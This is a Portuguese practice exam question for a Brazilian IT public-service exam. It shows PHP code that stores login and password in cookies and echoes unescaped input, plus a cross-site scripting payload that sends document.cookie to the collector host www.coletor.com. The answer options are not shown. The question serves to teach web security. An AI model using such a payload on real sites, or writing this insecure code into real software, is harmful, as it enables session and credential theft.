Simulado Conselho Nacional do Ministério Público - CNMP | Analista do CNMP - Desenvolvimento de Sistemas | 2019 pre-edital | Questão 275

Linguagens de implementação de regras de negócio / Orientada a objeto / PHP


Considere o trecho de programa PHP abaixo.



<?php

setcookie('PHPSSESID', 'meusid');
setcookie('login', 'meulogin');
setcookie('senha', 'minhasenha');

echo $GET['var'];

?>

Supondo que ao executar este trecho, um usuário passou como entrada:
 

<script>
document.write('<iframe width=1 height=1
src=http://www.coletor.com/rc.php?xss='+document.cookie.replace(//g,'')+'></iframe>')
</script>

cujo objetivo é capturar os dados de cookie do site alvo e enviá-los para o site www.coletor.com



Um Técnico de TI conclui corretamente que

Voltar à pagina de tópicos Próxima

Fonte: TéCNICO JUDICIáRIO - TECNOLOGIA DA INFORMAçãO / TRT 2ª / 2018 / FCC